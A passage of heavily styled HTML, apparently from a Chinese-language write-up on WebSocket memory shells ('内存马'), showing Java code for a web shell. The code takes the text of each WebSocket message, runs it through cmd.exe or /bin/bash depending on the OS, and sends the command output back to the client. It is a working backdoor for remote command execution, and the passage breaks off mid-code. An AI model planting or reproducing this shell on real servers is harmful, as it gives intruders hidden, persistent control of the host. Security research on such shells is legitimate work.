'OperatorTok';color: #666666;font-family: Consolas;">().</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">startsWith</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"windows"</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Process</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> exec</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">if</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">iswin</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                </span>exec </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Runtime</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getRuntime</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">().</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">exec</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">new</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">String</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">[]{</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"cmd.exe"</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"/c"</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> message</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">});</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">else</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                </span>exec </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Runtime</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getRuntime</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">().</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">exec</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">new</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">String</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">[]{</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"/bin/bash"</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"-c"</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> message</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">});</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">InputStream</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> ips </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> exec</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getInputStream</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">();</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">StringBuilder</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> sb </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">new</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">StringBuilder</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">();</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">int</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> i</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">while</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">((</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">i </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> ips</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">read</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">())</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">!=</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">-</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DecValTok';color: #40A070;font-family: Consolas;">1</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                </span>sb</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">append</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">((</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">char</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">i</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span>ips</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">close</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">();</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span>exec</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">waitFor</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">();</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">this</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">session</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getBasicRemote</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">().</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">sendText</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">sb</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">toString</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">());</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">catch</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Exception</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> e</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span 